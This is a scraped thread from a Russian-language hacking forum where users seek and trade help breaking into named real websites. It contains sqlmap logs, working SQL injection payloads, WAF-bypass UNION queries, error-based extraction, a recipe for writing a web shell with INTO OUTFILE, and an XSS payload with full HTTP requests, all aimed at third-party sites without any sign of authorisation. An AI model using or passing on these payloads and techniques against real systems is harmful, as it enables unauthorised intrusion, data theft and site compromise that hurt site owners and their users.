[20:52:54] [INFO] heuristic (XSS) test shows that (custom) POST parameter '#1*' might be vulnerable to XSS attacks
[20:52:54] [INFO] testing for SQL injection on (custom) POST parameter '#1*'
[20:52:54] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[20:52:55] [WARNING] reflective value(s) found and filtering out
[20:53:01] [INFO] (custom) POST parameter '#1*' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' injectable
[20:53:01] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[20:53:01] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[20:53:30] [INFO] target URL appears to be UNION injectable with 1 columns
[20:53:34] [INFO] testing 'Generic UNION query (random number) - 1 to 20 columns'
[20:54:02] [INFO] testing 'Generic UNION query (NULL) - 22 to 40 columns'
[20:54:23] [INFO] testing 'Generic UNION query (random number) - 22 to 40 columns'
[20:54:44] [INFO] testing 'Generic UNION query (NULL) - 42 to 60 columns'
[20:55:03] [INFO] testing 'Generic UNION query (random number) - 42 to 60 columns'
[20:55:23] [INFO] testing 'Generic UNION query (NULL) - 62 to 80 columns'
[20:55:42] [INFO] testing 'Generic UNION query (random number) - 62 to 80 columns'
sqlmap got a 302 redirect to 'http://chatgirl.nl/welcome/chat_closed'. Do you want to follow? [Y/n] n
[20:56:08] [INFO] testing 'Generic UNION query (NULL) - 82 to 100 columns'
[20:56:15] [INFO] testing 'Generic UNION query (random number) - 82 to 100 columns'
[20:56:20] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[20:56:25] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
[20:56:33] [INFO] testing 'MySQL UNION query (NULL) - 22 to 40 columns'
[20:56:38] [INFO] testing 'MySQL UNION query (random number) - 22 to 40 columns'
[20:56:43] [INFO] testing 'MySQL UNION query (NULL) - 42 to 60 columns'
[20:56:48] [INFO] testing 'MySQL UNION query (random number) - 42 to 60 columns'
[20:56:53] [INFO] testing 'MySQL UNION query (NULL) - 62 to 80 columns'
[20:56:58] [INFO] testing 'MySQL UNION query (random number) - 62 to 80 columns'
[20:57:03] [INFO] testing 'MySQL UNION query (NULL) - 82 to 100 columns'
[20:57:08] [INFO] testing 'MySQL UNION query (random number) - 82 to 100 columns'
(custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 400 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: nickname=&gender_id=1 AND (SELECT 9140 FROM(SELECT COUNT(*),CONCAT(0x71707a7071,(SELECT (ELT(9140=9140,1))),0x71767a7871,FLOOR(RAND(0)*2)) x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)®ion_id=city_2466&cv=Geef hier een omschrijving van jezelf.&coupon[]=&username=&password=&screen_resolution=800x400&os=Windows&screen_size=medium
---
[20:57:16] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0
Опять же идет редирект ,такое ощущение что все из-за него
[CODE]
Code:
http://chatgirl.nl/welcome/chat_closed'. Do you want to follow? [Y/n] n
$ sqlmap -u "http://chatgirl.nl/account/doLogin" --data="nickname=&gender_id=1*®ion_id=city_2466&cv=Geef+hier+een+omschrijving+van+jezelf.&coupon%5B%5
D=&username=&password=&screen_resolution=800x400&os=Windows&screen_size=medium" --random-agent --level 5 --technique=EU --dbms=MySQL --risk 3 --dbs
_
___ ___| |_____ ___ ___ {1.0-dev-341d2a6}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
starting at 20:57:19
[20:57:19] [INFO] fetched random HTTP User-Agent header from file 'D:\Pentest\Sql_inj\PentestBox\bin\WebApplications \sqlmap\txt\user-agents.txt': 'Mozilla/5.0 (Windows; U; Windows NT 6.0; nb-NO) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5'
custom injection marking character ('*') found in option '--data'. Do you want to process it? [Y/n/q]
[20:57:20] [INFO] testing connection to the target URL
sqlmap got a 302 redirect to 'http://chatgirl.nl/welcome/chat_closed'. Do you want to follow? [Y/n] n
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: nickname=&gender_id=1 AND (SELECT 9140 FROM(SELECT COUNT(*),CONCAT(0x71707a7071,(SELECT (ELT(9140=9140,1))),0x71767a7871,FLOOR(RAND(0)*2)) x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)®ion_id=city_2466&cv=Geef hier een omschrijving van jezelf.&coupon[]=&username=&password=&screen_resolution=800x400&os=Windows&screen_size=medium
---
[20:57:22] [INFO] testing MySQL
[20:57:23] [WARNING] the back-end DBMS is not MySQL
[20:57:23] [CRITICAL] sqlmap was not able to fingerprint the back-end database management system. Support for this DBMS will be implemented at some point
Редирект там может быть по многим причинам, может из-за ошибки, может из-за того что не авторизован, просто когда выдаст редирект, попробуй сделать отказ от переадрисаций
OxoTnik said:
↑ (https://antichat.live/posts/3863282/)
Редирект там может быть по многим причинам, может из-за ошибки, может из-за того что не авторизован, просто когда выдаст редирект, попробуй сделать отказ от переадрисаций
так я и отказываюсь ,просто не понимаю бред какой то
http://chatgirl.nl/account/doLogin скуля тут в посте
http://chatgirl.nl/welcome/chat_closed редирект идет суда
как закрывает доступ напрочь к http://chatgirl.nl/account/doLogin
+ удалил папку в оутпут , поставил снова раскручивать ,теперь пишет
the web server responded with an HTTP error code (503) which could interfere with the results of the tests
и не раскручивает
Да муторно sqlmap не тащит, ему нужны кукисы от авторизованного браузера, которые он быстро теряет
хз как, но после 5 минут тыкания он перестал редеректить, после этого перенёс кукисы из браузера в sqlmap, тогда стало нормально, но потом опять та же процедура.
нормально можно обработать в ручную, Firefox -> tamper data
Помогите waf обойти и вывод получить
http://www.haynes.com/products?sear...odel=BT125-3'+and+substr(version(),1,1)=5+--+ (http://www.haynes.com/products?searchType=vehicleApplicationSearch2&searchEnd=yes&sfID1=&sfID2=&sfID3=&year=2009&make=Boatian&model=BT125-3'+and+substr(version(),1,1)=5+--+)
http://www.haynes.com/products?sear...09&make=Boatian&model=BT125-3'+order+by+2+--+ (http://www.haynes.com/products?searchType=vehicleApplicationSearch2&searchEnd=yes&sfID1=&sfID2=&sfID3=&year=2009&make=Boatian&model=BT125-3'+order+by+2+--+)
DezMond™
30.06.2015, 14:21
http://www.arboe.at/index.php?id=9528&catId=176+/**/OrdEr/**//**/+by+1+--+&origin=search&no_cache=1
У кого получиться фильтр обойти?
reuvenmatbil
02.07.2015, 14:55
В админке есть возможность редактировать html
не могу найти html загрузчик
кто может подсказать код?
reuvenmatbil said:
↑ (https://antichat.live/posts/3864444/)
В админке есть возможность редактировать html
не могу найти html загрузчик
кто может подсказать код?
Я может не так понял конечно, вы это имели ввиду?
Code:
http://htmlbook.ru/samhtml5/formy/zagruzka-failov
reuvenmatbil
02.07.2015, 15:41
frank said:
↑ (https://antichat.live/posts/3864451/)
Я может не так понял конечно, вы это имели ввиду?
Code:
http://htmlbook.ru/samhtml5/formy/zagruzka-failov
да, он, но файл не хочет загружаться
kingbeef
02.07.2015, 16:30
Ты никак не загрузишь файл через html.
reuvenmatbil
02.07.2015, 17:01
kingbeef said:
↑ (https://antichat.live/posts/3864485/)
Ты никак не загрузишь файл через html.
стоит движок FCKeditor
можно только редактировать хтмл
то что на форуме обсуждали
/threads/314734/ (https://antichat.live/threads/314734/)
/thread170379.html (https://antichat.live/threads/170379/)
/threadnav141783-2-10.html (https://antichat.live/threads/141783/page-2/)
не подошло
DezMond™
02.07.2015, 19:43
Хелп
http://www.klassik-stiftung.de/fors...ications_pi1[searchForm][orderDirection]=DESC (http://www.klassik-stiftung.de/forschung/publikationen/?tx_lombscientificpublications_pi1%5Baction%5D=sea rch&tx_lombscientificpublications_pi1%5Bcontroller%5D= Publication&cHash=066e98e19f8243d9778de7a9a6c95062&tx_lombscientificpublications_pi1%5B__referrer%5D% 5BextensionName%5D=LombScientificPublications&tx_lombscientificpublications_pi1%5B__referrer%5D% 5BcontrollerName%5D=Publication&tx_lombscientificpublications_pi1%5B__referrer%5D% 5BactionName%5D=search&tx_lombscientificpublications_pi1%5B__hmac%5D=a%3A 3%3A%7Bs%3A10%3A%22searchForm%22%3Ba%3A9%3A%7Bs%3A 14%3A%22orderDirection%22%3Bi%3A1%3Bs%3A9%3A%22sor tField%22%3Bi%3A1%3Bs%3A7%3A%22keyword%22%3Bi%3A1% 3Bs%3A5%3A%22title%22%3Bi%3A1%3Bs%3A6%3A%22author% 22%3Bi%3A1%3Bs%3A7%3A%22company%22%3Bi%3A1%3Bs%3A4 %3A%22isbn%22%3Bi%3A1%3Bs%3A8%3A%22category%22%3Bi %3A1%3Bs%3A9%3A%22connector%22%3Bi%3A1%3B%7Ds%3A6% 3A%22action%22%3Bi%3A1%3Bs%3A10%3A%22controller%22 %3Bi%3A1%3B%7D484b31c758eedeaf61a8ed70991aa41cf7ef 92e9&tx_lombscientificpublications_pi1%5BsearchForm%5D% 5Bauthor%5D=1&tx_lombscientificpublications_pi1%5BsearchForm%5D% 5Bcompany%5D=1&tx_lombscientificpublications_pi1%5BsearchForm%5D% 5Bisbn%5D=1&tx_lombscientificpublications_pi1%5BsearchForm%5D% 5Bconnector%5D=1&tx_lombscientificpublications_pi1%5BsearchForm%5D% 5BsortField%5D=2&tx_lombscientificpublications_pi1%5BsearchForm%5D% 5Bcategory%5D=1&tx_lombscientificpublications_pi1%5BsearchForm%5D% 5Btitle%5D=1&tx_lombscientificpublications_pi1%5BsearchForm%5D% 5Bkeyword%5D=a&tx_lombscientificpublications_pi1%5BsearchForm%5D% 5BorderDirection%5D=DESC)'
DezMond™ said:
↑ (https://antichat.live/posts/3864560/)
Хелп
Инъекция в ORDER BY, Error-based;
Code:
DESC,error-based
DESC, updatexml(1, concat(0x3A, version()), 1)
reuvenmatbil,Никак нельзя. Ваш вопрос, более того, некорректен.
DezMond™ said:
↑ (https://antichat.live/posts/3863746/)
У кого получиться фильтр обойти?
За это конечно спасибо. Вариантов, как обычно, несколько.
Code:
index.php?id=9528&catId=177 UNION /*I j n t e h h n f d j i e v o m i r v e r a e l l e r i r e c t a t z u n d o p t i k n n e n*/ SELECT UNHEX /*I j n t e h h n f d j i e v o m i r v e r a e l l e r i r e c t a t z u n d o p t i k n n e n*/('3629554E494F4E2053454C45435420312C322C332C342C35 2C362C372C382C392C302C312C76657273696F6E28292C332C 342C352C362C372C382C392C302C312C342C332C342C352C36 2C372C382C392C302C312C352C332C342C352C362C372C382C 392C302C312C362C332C342C352C362C372C382C392C302C31 2C372C332C342C352C362C372C382C3923')&origin=search&no_cache=1
index.php?id=9528&catId=177 UNION /*I j n t e h h n f d j i e v o m i r v e r a e l l e r i r e c t a t z u n d o p t i k n n e n*/ SELECT x'3629554E494F4E2053454C45435420312C322C332C342C35 2C362C372C382C392C302C312C76657273696F6E28292C332C 342C352C362C372C382C392C302C312C342C332C342C352C36 2C372C382C392C302C312C352C332C342C352C362C372C382C 392C302C312C362C332C342C352C362C372C382C392C302C31 2C372C332C342C352C362C372C382C3923'&origin=search&no_cache=1
index.php?id=9528&catId=177.0UNION/**/SELECT x'3629554E494F4E2053454C45435420312C322C332C342C35 2C362C372C382C392C302C312C76657273696F6E28292C332C 342C352C362C372C382C392C302C312C342C332C342C352C36 2C372C382C392C302C312C352C332C342C352C362C372C382C 392C302C312C362C332C342C352C362C372C382C392C302C31 2C372C332C342C352C362C372C382C3923'&origin=search&no_cache=1
MySQL 5.5.27.
Br@!ns said:
↑ (https://antichat.live/posts/3863698/)
Помогите waf обойти и вывод получить
А где вы SQL Injection обнаружили? Вроде чисто.
XAMEHA said:
↑ (https://antichat.live/posts/3864606/)
А где вы SQL Injection обнаружили? Вроде чисто.
ну как.
http://www.haynes.com/products?sear...=2009&make=Boatian&model=BT125-3'+and+1=1+--+ (http://www.haynes.com/products?searchType=vehicleApplicationSearch2&searchEnd=yes&sfID1=&sfID2=&sfID3=&year=2009&make=Boatian&model=BT125-3'+and+1=1+--+) - TRUE
http://www.haynes.com/products?sear...=2009&make=Boatian&model=BT125-3'+and+1=2+--+ (http://www.haynes.com/products?searchType=vehicleApplicationSearch2&searchEnd=yes&sfID1=&sfID2=&sfID3=&year=2009&make=Boatian&model=BT125-3'+and+1=2+--+) - FALSE
А так же http://www.haynes.com/products?sear...09&make=Boatian&model=BT125-3'+Order+by+2+--+ (http://www.haynes.com/products?searchType=vehicleApplicationSearch2&searchEnd=yes&sfID1=&sfID2=&sfID3=&year=2009&make=Boatian&model=BT125-3'+Order+by+2+--+) - TRUE
новость вылазиет при true. так же при некоторых командах вылазиет белая страничка
2) А тут можно что нибудь сделать?
http://www.ok.gov/triton/modules/newsroom/newsroom.php?id=109+and+substr(123,1,1)=1+--+
http://www.ok.gov/triton/modules/newsroom/newsroom.php?id=109+order+by+1+--+
http://www.ok.gov/triton/modules/newsroom/newsroom.php?id=109+and+substr('a',1,1)='a'
Br@!ns said:
↑ (https://antichat.live/posts/3864645/)
ну как.
новость вылазиет при true. так же при некоторых командах вылазиет белая страничка
Всегда белая страница. Может быть вы HTTP запросы приведете?
Br@!ns said:
↑ (https://antichat.live/posts/3864645/)
2) А тут можно что нибудь сделать?
Копайте в сторону Oracle.
XAMEHA said:
↑ (https://antichat.live/posts/3864712/)
Всегда белая страница. Может быть вы HTTP запросы приведете?
.SpoilerTarget" type="button">Spoiler: img
http://clip2net.com/clip/m0/93258-clip-152kb.jpg
в FireFox действительно все белое, Опера нормально отображает
XAMEHA said:
↑ (https://antichat.live/posts/3864712/)
Всегда белая страница. Может быть вы HTTP запросы приведете?
нужна реальная кавычка, не урленкод
Code:
http://www.everynight.co.uk/imageViewer.asp?imageID=11206 and 1=1
В общем... Access, брут tables ничего не нашёл. Что делать дальше?
Есть Blind'овая скуля, проверил права -- ROOT. Нашел phpinfo, оттуда взял путь, нашел врайтабельную папку, вроде как все норм. Кручу sqlmap'ом ибо руками блайнд крутить это маразм. Попробовал залить шелл и наткнулся на не очень приятный момент, sqlmap не спрашивает путь для заливки шелла. Скуля в поле password, а там функция шифрования в md5 дает ошибку с раскрытием путей. Sqlmap берет этот путь и пытается залить шелл по тому пути, а меня не спрашивает. Как указать кастомный путь в таком случае?
Заливайте безо всяких SQLMap.
Просто используйте конструкцию
union select '' into outfile '/' , независимо от вывода результата.
Возможно, придётся поподбирать количество столбцов.
Остальных проблем, судя по вашему рассказу (MQ off, FilePriv on, FPD true), нет. Всё должно получиться.
Code:
1 limit 1 into outfile '/path/to/shell.php' lines terminated by ""--+
https://rdot.org/forum/showthread.php?t=60
тут можно что нибудь сделать?
http://www.air.am/en/your-itinerary/15'/
man4747 said:
↑ (https://antichat.live/posts/3865526/)
тут можно что нибудь сделать?
http://www.air.am/en/your-itinerary/15'/
а где там уязвимость?
страница изменяется
http://www.air.am/en/your-itinerary/15/ => http://www.air.am/en/your-itinerary/15'/
man4747 said:
↑ (https://antichat.live/posts/3865566/)
страница изменяется
http://www.air.am/en/your-itinerary/15/
=>
http://www.air.am/en/your-itinerary/15'/
http://www.air.am/en/your-itinerary/15kj/ (http://www.air.am/en/attention/57k/) - так же изменяется, и кавычка тут непричем
ocheretko
07.07.2015, 00:17
Code:
">
Чтобы сработала XSS осталось добится, чтобы вставился пробел вмежду тегами img srcset. Символы \ и / заменяются на %20. Подскажите куда можно еще копать?
ocheretko said:
↑ (https://antichat.live/posts/3865815/)
Code:
">
Чтобы сработала XSS осталось добится, чтобы вставился пробел вмежду тегами img srcset. Символы \ и / заменяются на %20. Подскажите куда можно еще копать?
где сам инъект? на что там waf?
ocheretko
07.07.2015, 01:24
Вывод
">
Что Вы имеете ввиду под вопросом "где сам инъект?".
waf на пробелы и слешы. Слешы черт с ним, а вот пробелы - не могу разделить атрибут от тега
ocheretko said:
↑ (https://antichat.live/posts/3865831/)
Вывод
">
Что Вы имеете ввиду под вопросом "где сам инъект?".
waf на пробелы и слешы. Слешы черт с ним, а вот пробелы - не могу разделить атрибут от тега
как вариант: %0C
POC: http://jsfiddle.net/4qgk5qyj/
ocheretko
07.07.2015, 04:01
Code:
">
%0C так и остается в исходном коде, также как и пробел заменяется на %20
ocheretko said:
↑ (https://antichat.live/posts/3865844/)
Code:
">
%0C так и остается в исходном коде, также как и пробел заменяется на %20
отправьте данные через сниффер, например burp. и скиньте уже сайт в лс
ocheretko
07.07.2015, 13:29
Code:
GET /search/%22%3E%3Cimg%20srcset%3D%22%2C%2C%2C%2C%2Cx%22oner ror%3D%22alert(1)%22%3E HTTP/1.1
Host: *********
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: *********
Cookie: PHPSESSID=p7f3b38uuh1icqqqndscb75a10; Lang=ru; ShopID=37; __utma=244353110.90581892.1436196504.1436227051.14 36260016.5; __utmc=244353110; __utmz=244353110.1436196504.1.1.utmcsr=(direct)|ut mccn=(direct)|utmcmd=(none); jv_enter_ts_dUv23LxxhD=1436196515709; jv_visits_count_dUv23LxxhD=1; jv_pages_count_dUv23LxxhD=107; jv_gui_state_dUv23LxxhD=WIDGET; jv_cm_dUv23LxxhD=ws; jv_client_id_dUv23LxxhD=242556.2oZiZbl%2Bz3jZ%2Fn3 i7hwsPj8u5Hm4%2Byfv2aQVwObJGqY; jv_invitation_time_dUv23LxxhD=1436260532076; jv_close_time_dUv23LxxhD=1436220689308; __utmb=244353110.14.9.1436260532079; _ym_visorc_20996566=w; jv_sess_id_dUv23LxxhD=sbd62ebf98ea95eb5d817667c74a 59689; __utmt=1
Connection: keep-alive
Привет всем! Подскажите тут есть скуль?
http://www.heritage.am/ru/component/blog_calendar/?year=2015&month=02&day=13&modid=61+order+by+1--+
http://www.heritage.am/ru/component/blog_calendar/?year=2015&month=02&day=13&modid=61+order+by+10--+
Там по моему фильтр на Union select стоит, не могу обойти никак
lindau said:
↑ (https://antichat.live/posts/3866284/)
Привет всем! Подскажите тут есть скуль?
http://www.heritage.am/ru/component/blog_calendar/?year=2015&month=02&day=13&modid=61+order+by+1--+
http://www.heritage.am/ru/component/blog_calendar/?year=2015&month=02&day=13&modid=61+order+by+10--+
Там по моему фильтр на Union select стоит, не могу обойти никак
увы, вывода нет.
Code:
http://www.heritage.am/ru/component/blog_calendar/?year=2015&month=02&day=13&modid=61+and+1=2/*%00*/union+select+6666666666--+
yarbabin said:
↑ (https://antichat.live/posts/3866302/)
увы, вывода нет.
Code:
http://www.heritage.am/ru/component/blog_calendar/?year=2015&month=02&day=13&modid=61+and+1=2/*%00*/union+select+6666666666--+
Вот жеж беда =((
Для посимвольного перебора тогда получается так: http://www.heritage.am/ru/component...*/+and+substring((select+version()),1,1)=5--+ (http://www.heritage.am/ru/component/blog_calendar/?year=2015&month=02&day=13&modid=61/*%00*/+and+substring((select+version()),1,1)=5--+) ?
Это ведь Joomla, стандартная таблица jos_users?
Почему когда пробую отправить файл через форму
ссылка преобразуется так www.site.ru/?file=dk.php (http://www.site.ru/?file=dk.php) и файл или картинка не запускается,просто обычную страницу грузит
djon said:
↑ (https://antichat.live/posts/3866382/)
Почему когда пробую отправить файл через форму
ссылка преобразуется так
www.site.ru/?file=dk.php (http://www.site.ru/?file=dk.php)
и файл или картинка не запускается,просто обычную страницу грузит
начните с азов. html это язык разметки, а не язык программирования. через него вы не сможете залить файл
-------------------------------------------------------------------------------------------------------------------------------------------------
Что я делаю не так ?выдает ошибку Warning: move_uploaded_file(): Unable to move '/tmp/phpT9YXce' to 'http://www.site.ru/p1/dk.php' in /home/u941469589/public_html/upload.php on line 12
-------------------------------------------------------------------------------------------------------------------------------------------------
сама форма
-------------------------------------------------------------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------------------------------------------------------------
сам upload.php
-------------------------------------------------------------------------------------------------------------------------------------------------
1024*3*1024)
{
echo ("Размер файла превышает три мегабайта");
exit;
}
// Проверяем загружен ли файл
if(is_uploaded_file($_FILES["filename"]["tmp_name"]))
{
// Если файл загружен успешно, перемещаем его
// из временной директории в конечную
move_uploaded_file($_FILES["filename"]["tmp_name"], "http://www.site.ru/p1/".$_FILES["filename"]["name"]);
} else {
echo("Ошибка загрузки файла");
}
?>
-------------------------------------------------------------------------------------------------------------------------------------------------
.SpoilerTarget" type="button">Spoiler: Инфа которая поможет
Ребят у меня есть программа для поиска уязвимости,я перевёл гуглом так что не ругайтесь
Сведения об уязвимости
обнаружено, что данные пароля передаются через HTTP.
влияние
Если злоумышленник может перехватить трафик, он / она может украсть учетные данные пользователей.
Действия, чтобы Взять
См средство для решения.
Переместить все ваши критические форм и страниц HTTPS и не служи им через HTTP.
средство
Все конфиденциальные данные должны быть переданы по протоколу HTTPS, а не HTTP. Формы должны быть поданы в течение HTTPS. Все аспекты применения, которые принимают пользовательский ввод, начиная с процесса входа в систему, должны обслуживаться только через HTTPS.
Форма цель действия :
http://*******.ru/wp-login.php . Сайт я не скажу естественно . Дак вот что мне нужно сделать? .
Есть HTML код страницы
.SpoilerTarget" type="button">Spoiler
?
******.ru › Войти
*******.ru
-->
Имя пользователя
Пароль
Запомнить меня
Регистрация | Забыли пароль?
function wp_attempt_focus(){
setTimeout( function(){ try{
d = document.getElementById('user_login');
d.focus();
d.select();
} catch(e){}
}, 200);
}
wp_attempt_focus();
if(typeof wpOnload=='function')wpOnload();
document.write("")
← Назад к сайту «*******.ru»
Не знаю поможет ли это :
GET /wp-login.php?redirect_to=http%3A%2F%2F*****.ru%2Fwp-admin%2Fpost.php%3Faction%3Dedit%26post%3D%257Bpos t-id%257D&reauth=1 HTTP/1.1
Cache-Control: no-cache
Referer: http://*****.ru/wp-admin/post.php?action=edit&post={post-id} (http://*****.ru/wp-admin/post.php?action=edit&post=%7Bpost-id%7D)
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36 Netsparker
Accept-Language: en-us,en;q=0.5
X-Scanner: ******
Host: ****.ru
Cookie: 21e558d425bf38e4a2473c40a5b0b2b9=85df36e59c655c31d 0b01c3be92e0d0d
Accept-Encoding: gzip, deflate
---------------------------------------------------------------------------------------
robots.txt :
User-agent: *
Disallow: /cgi-bin/
Disallow: /wp-admin/
Allow: /doc/
Allow: /img/
Allow: /wp-content/uploads/
-------------------------------------------
Сведения об уязвимости определены cookie(s), не помеченных как HttpOnly.
HttpOnly cookie(s) не может быть прочитан на стороне клиента сценариев, поэтому маркировка печенье, как HttpOnly может обеспечить дополнительный уровень защиты от атак межсайтового скриптинга(это вроде xxs . )
влияние
Во время межсайтового сценария атаки(xxs?), злоумышленник может легко получить доступ к куки и угнать сессию жертвы.
Действия, чтобы Взять
См средство для решения.
Рассмотрим маркировки всех печенье, используемых приложением как HttpOnly. (После этих изменений JavaScript код не будет в состоянии прочитать печенье).
средство
Отметить куки, как HttpOnly. Это будет дополнительный слой защиты от XSS. Однако это не серебряная пуля и не будет защищать систему от атак межсайтового скриптинга.Злоумышленник может использовать такой инструмент, как XSS туннель, чтобы обойти HttpOnly защиты.
Внешние ссылки
Как это сделать ? .
-----------------------------------------------------------------------------------
Url http://*******.ru/wp-login.php?action=lostpassword (http://helpset.ru/wp-login.php?action=lostpassword)
Identified Field Name user_login .
Сведения об уязвимости обнаружено, что автополный включен в одном или нескольких полях формы.
Это были важные поля, такие как "кредитная карта".
Влияние
Если пользователь выбирает для сохранения, данные, введенные в этих областях будут кэшироваться браузером. Злоумышленник, могут получить доступ к браузеру жертвы мог украсть эту информацию. Это особенно важно, если приложение обычно используется в общих компьютеров, таких как интернет-кафе или терминалов аэропорта.
Действия, чтобы Взять
Добавить атрибут автозаполнения = "OFF" в виде тега или отдельных «входных» полей.
Найти все экземпляры входов, которые хранят личные данные и выключить автозаполнение. Поля, которые содержат данные, такие как "кредитная карта" или "CCV" типа данных, не следует кэшировать. Вы можете позволить приложению кэшировать имена и запоминать пароли; Однако, в большинстве случаев это не рекомендуется.
Re-сканирование приложения после устранения выявленных проблем, чтобы обеспечить все исправления были применены правильно.
Требуемые навыки для успешной эксплуатации
Во-первых, злоумышленник должен либо физический доступ или права выполнения кода пользовательского уровня для успешной эксплуатации. Демпинг все данные из браузера может быть довольно легко, и количество автоматизированных инструментов существуют для проведения этого. Где злоумышленник не может выводить данные, он / она все еще может просматривать недавно посещенные веб-сайты и активировать функцию автозаполнения, чтобы увидеть ранее введенные значения.
Внешние ссылки
Использование автозаполнения в HTML форм
П.С : При переходе на ссылку мне предлагают ввести емайл или логин где я получу новый пасс,естественно пашет токо на зареганный пользователей .
-----------------------------------------------------------------------
Url http://*******.ru/crossdomain.xml
Правила политики
Классификация Классификация
OWASP 2010 A6
OWASP 2013 А5
КВО 16
WASC 15
Сведения об уязвимости обнаружил открытый файл crossdomain.xml политики.
влияние
Открыть файл политики crossdomain.xml позволяет другие файлы SWF, чтобы HTTP запросов к веб-серверу и увидеть его реакцию. Это может быть использован для доступа к одно время жетоны и CSRF одноразовые номера, чтобы обойти CSRF ограничений.
средство
Настройте crossdomain.xml, чтобы предотвратить доступ отовсюду к вашему домену.
Внешние ссылки
Рекомендации по использованию файла политики кросс-доменных для Flash Player
Crossdomain.xml приглашает Cross-Site Mayhem .
Как это сделать?
[/spoiler=Инфа которая поможет]
https://www.polyvinylrecords.com/we...te/eomsA19bR_Oe5L4nQhdVrw?product_id=split_ep (https://www.polyvinylrecords.com/webservices/v1/cart/create/eomsA19bR_Oe5L4nQhdVrw?product_id=split_ep)
.SpoilerTarget" type="button">Spoiler: POST
Host: www.polyvinylrecords.com (http://www.polyvinylrecords.com)
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:29.0) Gecko/20100101 Firefox/29.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: _ga=GA1.2.478174453.1436420788; PHPSESSID=vm6ku7j5ht07atf0n4gthmepk1; cart=k453dj5moskdvjcki8sbblbka69999999999999'+unio n+select+1,mid(version(),1,4),3,4,5+--+; __ar_v4=%7C7K674WVRA5EQTKVG7RIBHQ%3A20150708%3A1%7 CSRBJNEWXLNH6JM5MFYZHWM%3A20150708%3A1%7CON7KI2FHT ZEY5EYCVTEEGZ%3A20150708%3A1
Connection: keep-alive
Показываются только цифры, можно что нибудь придумать, что бы буквы тоже выводились ?
Br@!ns said:
↑ (https://antichat.live/posts/3866494/)
https://www.polyvinylrecords.com/we...te/eomsA19bR_Oe5L4nQhdVrw?product_id=split_ep (https://www.polyvinylrecords.com/webservices/v1/cart/create/eomsA19bR_Oe5L4nQhdVrw?product_id=split_ep)
Spoiler: POST
Host:
www.polyvinylrecords.com (http://www.polyvinylrecords.com)
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:29.0) Gecko/20100101 Firefox/29.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: _ga=GA1.2.478174453.1436420788; PHPSESSID=vm6ku7j5ht07atf0n4gthmepk1; cart=k453dj5moskdvjcki8sbblbka69999999999999'+unio n+select+1,mid(version(),1,4),3,4,5+--+; __ar_v4=%7C7K674WVRA5EQTKVG7RIBHQ%3A20150708%3A1%7 CSRBJNEWXLNH6JM5MFYZHWM%3A20150708%3A1%7CON7KI2FHT ZEY5EYCVTEEGZ%3A20150708%3A1
Connection: keep-alive
Показываются только цифры, можно что нибудь придумать, что бы буквы тоже выводились ?
Использовать ascii(mid(version(),1,4)) или ord(mid(version(),1,4))
SaNDER said:
↑ (https://antichat.live/posts/3866485/)
Spoiler: Инфа которая поможет
Ребят у меня есть программа для поиска уязвимости,я перевёл гуглом так что не ругайтесь
Сведения об уязвимости
обнаружено, что данные пароля передаются через HTTP.
влияние
Если злоумышленник может перехватить трафик, он / она может украсть учетные данные пользователей.
Действия, чтобы Взять
См средство для решения.
Переместить все ваши критические форм и страниц HTTPS и не служи им через HTTP.
средство
Все конфиденциальные данные должны быть переданы по протоколу HTTPS, а не HTTP. Формы должны быть поданы в течение HTTPS. Все аспекты применения, которые принимают пользовательский ввод, начиная с процесса входа в систему, должны обслуживаться только через HTTPS.
Форма цель действия :
http://*******.ru/wp-login.php
. Сайт я не скажу естественно . Дак вот что мне нужно сделать? .
Есть HTML код страницы
Spoiler
?
******.ru › Войти
*******.ru
-->
Имя пользователя
Пароль
Запомнить меня
Регистрация | Забыли пароль?
function wp_attempt_focus(){
setTimeout( function(){ try{
d = document.getElementById('user_login');
d.focus();
d.select();
} catch(e){}
}, 200);
}
wp_attempt_focus();
if(typeof wpOnload=='function')wpOnload();
document.write("")
← Назад к сайту «*******.ru»
Не знаю поможет ли это :
